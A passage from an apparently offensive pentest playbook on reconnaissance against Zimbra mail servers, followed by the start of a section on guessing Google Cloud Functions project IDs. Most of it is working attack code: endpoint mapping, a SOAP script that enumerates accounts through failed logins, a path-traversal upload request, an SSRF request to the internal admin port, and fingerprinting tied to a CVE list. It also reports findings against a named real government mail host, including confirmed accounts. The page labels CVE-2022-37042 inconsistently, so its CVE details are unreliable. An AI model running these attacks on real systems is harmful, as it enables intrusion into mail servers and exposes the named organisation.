&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Zimbra Collaboration is a common email/collaboration server in government and universities, it has a long record of critical CVEs, and a default install exposes a rich surface before any login (SOAP, upload and proxy servlets, mobile client, static JS bundles):&lt;/p&gt;
&lt;h4 id="essential-endpoints" &gt;
&lt;div&gt;
&lt;a href="#essential-endpoints"&gt;
###
&lt;/a&gt;
Essential Endpoints
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Identify Zimbra&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -skI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;zimbra&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# /zimbra/ path, /zimbraAdmin/, cookies ZM_TEST, JSESSIONID&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Map endpoints&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; path in / /robots.txt /service/soap /service/admin/soap &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; /service/upload /service/proxy /zimbraAdmin/ &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; /zimbra/ /public/ /m/ /js/Startup1_2_all.js; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;code&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;curl -sk -o /dev/null -w &lt;span style="color:#a6d189"&gt;&amp;#34;%{http_code}&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$path&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$path&lt;/span&gt;&lt;span style="color:#a6d189"&gt; → &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$code&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# /service/upload = UploadServlet (POST 200 = active!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# /service/proxy = proxy SSRF (401 = exists, requires auth)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# /public/ = public directory (403 = exists, blocked)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# /m/ = mobile client (302 = active, redirects)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="soap-user-enumeration" &gt;
&lt;div&gt;
&lt;a href="#soap-user-enumeration"&gt;
###
&lt;/a&gt;
SOAP User Enumeration
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;Zimbra can leak whether an account exists through the SOAP fault returned by &lt;code&gt;AuthRequest&lt;/code&gt;. By default a wrong password and an unknown account both produce &lt;code&gt;authentication failed for [user]&lt;/code&gt;, so the useful signals are the state-specific faults (maintenance mode, locked) and, on old or misconfigured servers, &lt;code&gt;no such account&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;import re
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)   # self-signed certs are the norm

TARGET = "https://TARGET"

soap_template = '''&amp;lt;soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"&amp;gt;
 &amp;lt;soap:Body&amp;gt;
 &amp;lt;AuthRequest xmlns="urn:zimbraAccount"&amp;gt;
 &amp;lt;account by="name"&amp;gt;{user}&amp;lt;/account&amp;gt;
 &amp;lt;password&amp;gt;wrongpass&amp;lt;/password&amp;gt;
 &amp;lt;/AuthRequest&amp;gt;
 &amp;lt;/soap:Body&amp;gt;
&amp;lt;/soap:Envelope&amp;gt;'''

# Every attempt is a failed login in the audit log and counts toward
# zimbraPasswordLockoutMaxFailures: keep the list short and space the requests out.
for user in ['admin', 'root', 'compras', 'backup', 'info']:
    body = soap_template.format(user=user)
    r = requests.post(f"{TARGET}/service/soap", data=body,
                      headers={'Content-Type': 'application/soap+xml'},
                      verify=False, timeout=10)
    fault = re.findall(r'&amp;lt;soap:Text&amp;gt;(.*?)&amp;lt;/soap:Text&amp;gt;', r.text)
    if not fault:
        print(f"{user}: no SOAP fault (HTTP {r.status_code})")
        continue
    msg = fault[0]
    if 'maintenance mode' in msg:
        print(f"{user}: EXISTS (maintenance mode!)")            # ← only a real account can be in this state
    elif 'no such account' in msg:
        print(f"{user}: DOES NOT EXIST")                        # ← rare, old versions only
    elif 'authentication failed' in msg:
        print(f"{user}: AUTH_FAILED (ambiguous: wrong password or unknown user)")  # ← default reply for both
    else:
        print(f"{user}: {msg}")
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Message patterns&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;authentication failed for [user]&lt;/code&gt; (code &lt;code&gt;account.AUTH_FAILED&lt;/code&gt;) → ambiguous: the default reply for a wrong password and for an unknown account alike, so confirm with other methods (OSINT, GAL, mail bounces)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;account is in maintenance mode&lt;/code&gt; (&lt;code&gt;account.MAINTENANCE_MODE&lt;/code&gt;) → user EXISTS and is in maintenance mode (CONFIRMED!)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;no such account&lt;/code&gt; (&lt;code&gt;account.NO_SUCH_ACCOUNT&lt;/code&gt;) → user DOES NOT exist (old versions; current builds hide this behind AUTH_FAILED)&lt;/li&gt;
&lt;li&gt;The machine-readable code sits in &lt;code&gt;&amp;lt;Error xmlns="urn:zimbra"&amp;gt;&amp;lt;Code&amp;gt;&lt;/code&gt; inside the fault detail; match on it rather than on the localized text.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="uploadservlet--path-traversal-cve-2022-37042" &gt;
&lt;div&gt;
&lt;a href="#uploadservlet--path-traversal-cve-2022-37042"&gt;
###
&lt;/a&gt;
UploadServlet — Path Traversal (CVE-2022-37042)
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;The &lt;code&gt;/service/upload&lt;/code&gt; endpoint accepts file uploads. In vulnerable versions, the filename parameter accepts path traversal:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test UploadServlet&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/service/upload&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -F &lt;span style="color:#a6d189"&gt;&amp;#34;file=@test.txt;filename=../../../opt/zimbra/data/tmp/evil.txt&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Normal response (401): requires authentication&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Response 200 with attachmentId = functional, try path traversal&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="serviceproxy--internal-ssrf" &gt;
&lt;div&gt;
&lt;a href="#serviceproxy--internal-ssrf"&gt;
###
&lt;/a&gt;
/service/proxy — Internal SSRF
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;If authenticated, the Zimbra ProxyServlet (&lt;code&gt;/service/proxy?target=URL&lt;/code&gt;) fetches the target on the client's behalf. It exists for feed and mashup requests and honours the &lt;code&gt;zimbraProxyAllowedDomains&lt;/code&gt; allow-list, so reaching internal hosts such as the admin port (7071) only works where that list is loose or wildcarded; an unauthenticated 401 only tells you the servlet is present:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Requires authentication cookie&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/service/proxy?target=http://127.0.0.1:7071/zimbraAdmin/&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Cookie: ZM_AUTH_TOKEN=...&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="soap-trace-ids--environment-info" &gt;
&lt;div&gt;
&lt;a href="#soap-trace-ids--environment-info"&gt;
###
&lt;/a&gt;
SOAP Trace IDs — Environment Info
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;SOAP faults carry a &lt;code&gt;&amp;lt;Trace&amp;gt;&lt;/code&gt; element inside the &lt;code&gt;urn:zimbra&lt;/code&gt; Error detail. It exists so an admin can correlate a client error with &lt;code&gt;mailbox.log&lt;/code&gt;, but it also leaks a little about the environment to anyone who triggers a fault:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-xml" data-lang="xml"&gt;&amp;lt;Trace&amp;gt;qtp66233253-9975:1782161969125:0daaf6c77a00b8c8&amp;lt;/Trace&amp;gt;
# qtp66233253-9975 = Jetty QueuedThreadPool thread (embedded Jetty; pool id 66233253, thread 9975)
# 1782161969125 = server clock in milliseconds since the Unix epoch (2026-06-22 UTC here); compare with the Date header to spot clock skew
# 0daaf6c77a00b8c8 = per-request id, the value to quote if you ever need the matching server log line
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="version-fingerprinting" &gt;
&lt;div&gt;
&lt;a href="#version-fingerprinting"&gt;
###
&lt;/a&gt;
Version Fingerprinting
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Startup JS bundles (1854KB+ with internal versions)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/js/Startup1_2_all.js&amp;#34;&lt;/span&gt; | grep -oP &lt;span style="color:#a6d189"&gt;&amp;#39;ZmSetting.*?&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Response headers&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -skI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/&amp;#34;&lt;/span&gt; | grep -iE &lt;span style="color:#a6d189"&gt;&amp;#34;(x-zimbra|server|set-cookie|zimbra)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Admin error on port 443&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/zimbraAdmin/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;Request not allowed on port 443&amp;#34; → Admin EXISTS on internal port&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="cves-by-version" &gt;
&lt;div&gt;
&lt;a href="#cves-by-version"&gt;
###
&lt;/a&gt;
CVEs by Version
&lt;/div&gt;
&lt;/h4&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Version&lt;/th&gt;
&lt;th&gt;Build&lt;/th&gt;
&lt;th&gt;CVEs&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;8.8.11&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;GA 2019&lt;/td&gt;
&lt;td&gt;CVE-2022-27924 (memcache injection, credential theft), CVE-2022-27925 (mboximport ZIP path traversal, RCE), CVE-2022-37042 (mboximport auth bypass: makes 27925 unauthenticated), CVE-2023-37580 (reflected XSS)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;8.8.15&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;GA 2020&lt;/td&gt;
&lt;td&gt;CVE-2022-27924, CVE-2022-27925, CVE-2022-37042, CVE-2022-24682 (Calendar XSS, used for session theft)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;9.0.0&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;2021+&lt;/td&gt;
&lt;td&gt;CVE-2022-37042, CVE-2023-37580&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;10.0.x&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;2023+&lt;/td&gt;
&lt;td&gt;CVE-2023-37580, CVE-2024-45579 (auth bypass)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: &lt;code&gt;mail.ign.gob.ar&lt;/code&gt; — Zimbra 8.8.11_GA_3787:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;/service/upload&lt;/code&gt; returns 200 (UploadServlet active, requires auth)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/service/soap&lt;/code&gt; functional — user &lt;code&gt;admin&lt;/code&gt; confirmed, &lt;code&gt;compras&lt;/code&gt; in maintenance mode&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/service/proxy&lt;/code&gt; returns 401 (exists, requires authentication)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/zimbraAdmin/&lt;/code&gt; returns &amp;ldquo;Request not allowed on port 443&amp;rdquo; (Admin exists behind firewall)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/m/&lt;/code&gt; mobile client active (302 → jsessionid)&lt;/li&gt;
&lt;/ul&gt;
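&lt;p&gt;&lt;strong&gt;Added example&lt;/strong&gt; (not code from the original playbook): the enumeration loop in the SOAP User Enumeration subsection keys on the human-readable fault text, which changes between locales and versions. The parser below serves that subsection and the SOAP Trace IDs one together: it reads the machine-readable &lt;code&gt;account.*&lt;/code&gt; code inside the &lt;code&gt;urn:zimbra&lt;/code&gt; Error detail, turns it into a verdict, and decodes the Trace id into thread, server clock and request id. The sample replies are constructed in the shape Zimbra returns (the first Trace is the one quoted on this page, the others are invented); the verdict table and the &lt;code&gt;check_user&lt;/code&gt; helper are this example's own assumptions, and &lt;code&gt;check_user&lt;/code&gt; is the only part that touches the network.&lt;/p&gt;

```python
import ssl
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET
from datetime import datetime, timezone

SOAP_NS = "http://www.w3.org/2003/05/soap-envelope"
ZIMBRA_NS = "urn:zimbra"

# What each Zimbra fault code proves about the account name tried. AUTH_FAILED is the
# default reply for a wrong password AND for an unknown account, so it proves nothing.
VERDICTS = {
    "account.AUTH_FAILED": "undetermined",
    "account.MAINTENANCE_MODE": "exists",
    "account.PASSWORD_LOCKED": "exists",
    "account.CHANGE_PASSWORD": "exists",
    "account.NO_SUCH_ACCOUNT": "missing",
}

AUTH_REQUEST = (
    '<soap:Envelope xmlns:soap="{ns}"><soap:Body><AuthRequest xmlns="urn:zimbraAccount">'
    '<account by="name">{user}</account><password>wrongpass</password>'
    '</AuthRequest></soap:Body></soap:Envelope>'
)


def parse_fault(xml_text):
    """Reason text, Zimbra error code and Trace id of a SOAP fault; None if not a fault."""
    root = ET.fromstring(xml_text)
    fault = root.find(f".//{{{SOAP_NS}}}Fault")
    if fault is None:
        return None
    return {
        "reason": fault.findtext(f"{{{SOAP_NS}}}Reason/{{{SOAP_NS}}}Text", default=""),
        "code": fault.findtext(f".//{{{ZIMBRA_NS}}}Code", default=""),   # machine-readable
        "trace": fault.findtext(f".//{{{ZIMBRA_NS}}}Trace", default=""),
    }


def classify(xml_text):
    """Verdict for one AuthRequest reply, keyed on the error code rather than its wording."""
    fault = parse_fault(xml_text)
    if fault is None:
        return "valid-credentials"          # an AuthResponse came back instead of a fault
    return VERDICTS.get(fault["code"], "unknown")


def parse_trace(trace):
    """Decode 'thread:epoch_ms:request_id' (qtp = Jetty QueuedThreadPool thread)."""
    parts = trace.split(":")
    if len(parts) != 3 or not parts[1].isdigit():
        return None
    thread, epoch_ms, request_id = parts
    return {
        "thread": thread,
        "jetty": thread.startswith("qtp"),
        "server_time": datetime.fromtimestamp(int(epoch_ms) / 1000, tz=timezone.utc),
        "request_id": request_id,
    }


def check_user(target, user, timeout=10):
    """Live check: one AuthRequest with a wrong password. Every call is a failed login in
    the audit log and counts toward the lockout threshold, so keep candidate lists short."""
    body = AUTH_REQUEST.format(ns=SOAP_NS, user=user).encode()
    req = urllib.request.Request(f"{target}/service/soap", data=body,
                                 headers={"Content-Type": "application/soap+xml"})
    ctx = ssl._create_unverified_context()   # self-signed certs are the norm on these hosts
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            text = resp.read().decode()
    except urllib.error.HTTPError as e:      # Zimbra returns faults with HTTP 500
        text = e.read().decode()
    return classify(text), parse_fault(text)


def _fault(reason, code, trace):
    """Constructed fault in the shape Zimbra returns (sample data, not a capture)."""
    return (
        f'<soap:Envelope xmlns:soap="{SOAP_NS}"><soap:Body><soap:Fault>'
        '<soap:Code><soap:Value>soap:Sender</soap:Value></soap:Code>'
        f'<soap:Reason><soap:Text>{reason}</soap:Text></soap:Reason>'
        f'<soap:Detail><Error xmlns="urn:zimbra"><Code>{code}</Code><Trace>{trace}</Trace>'
        '</Error></soap:Detail></soap:Fault></soap:Body></soap:Envelope>'
    )


# Sample replies: the first Trace is the one quoted on this page, the other two are invented.
SAMPLES = {
    "admin": _fault("authentication failed for [admin]", "account.AUTH_FAILED",
                    "qtp66233253-9975:1782161969125:0daaf6c77a00b8c8"),
    "compras": _fault("account is in maintenance mode", "account.MAINTENANCE_MODE",
                      "qtp66233253-9976:1782161969342:1b2c3d4e5f607182"),
    "nobody": _fault("no such account: nobody", "account.NO_SUCH_ACCOUNT",
                     "qtp66233253-9977:1782161969511:2c3d4e5f60718293"),
}

if __name__ == "__main__":
    for user, reply in SAMPLES.items():
        t = parse_trace(parse_fault(reply)["trace"])
        print(f"{user}: {classify(reply)}, server clock {t['server_time']:%Y-%m-%d %H:%M:%S} UTC")
```

Matching on the code instead of the text also makes the check stable against the admin-side locale, and the decoded server clock is worth a line in the report when it drifts from the HTTP &lt;code&gt;Date&lt;/code&gt; header.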
&lt;hr&gt;
&lt;h2 id="9-cloud-functions--serverless-gcp-aws" &gt;
&lt;div&gt;
&lt;a href="#9-cloud-functions--serverless-gcp-aws"&gt;
#
&lt;/a&gt;
9. CLOUD FUNCTIONS &amp;amp; SERVERLESS (GCP, AWS)
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="91-url-patterns-gcp" &gt;
&lt;div&gt;
&lt;a href="#91-url-patterns-gcp"&gt;
##
&lt;/a&gt;
9.1 URL Patterns (GCP)
&lt;/div&gt;
&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;https://{REGION}-{PROJECT_ID}.cloudfunctions.net/{FUNCTION_NAME}
https://us-central1-{PROJECT_ID}.cloudfunctions.net/api/feed
&lt;/code&gt;&lt;/pre&gt;&lt;h3 id="92-finding-the-project_id" &gt;
&lt;div&gt;
&lt;a href="#92-finding-the-project_id"&gt;
##
&lt;/a&gt;
9.2 Finding the PROJECT_ID
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Common company name variations&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;projects &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a6d189"&gt;&amp;#34;empresa&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;empresa-app&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;empresa-prod&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;empresa-dev&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;empresa-1&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;empresa-12345&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;app-empresa&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;admin-1a2b3&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;regions &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a6d189"&gt;&amp;#34;us-central1&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;us-east1&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;southamerica-east1&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;europe-west1&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; proj &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; projects:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; region &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; regions:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; url &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;https://&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;region&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;-&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;proj&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.cloudfunctions.net/api/feed?limit=1&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;try&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(url, timeout&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;!=&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;404&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;and&lt;/span&gt; &lt;span style="color:#99d1db"&gt;len&lt;/span&gt;(r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text) &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;20&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;✅ &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;url&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; -&amp;gt; &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; | &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text[:&lt;span style="color:#ef9f76"&gt;100&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;except&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;pass&lt;/span&gt;
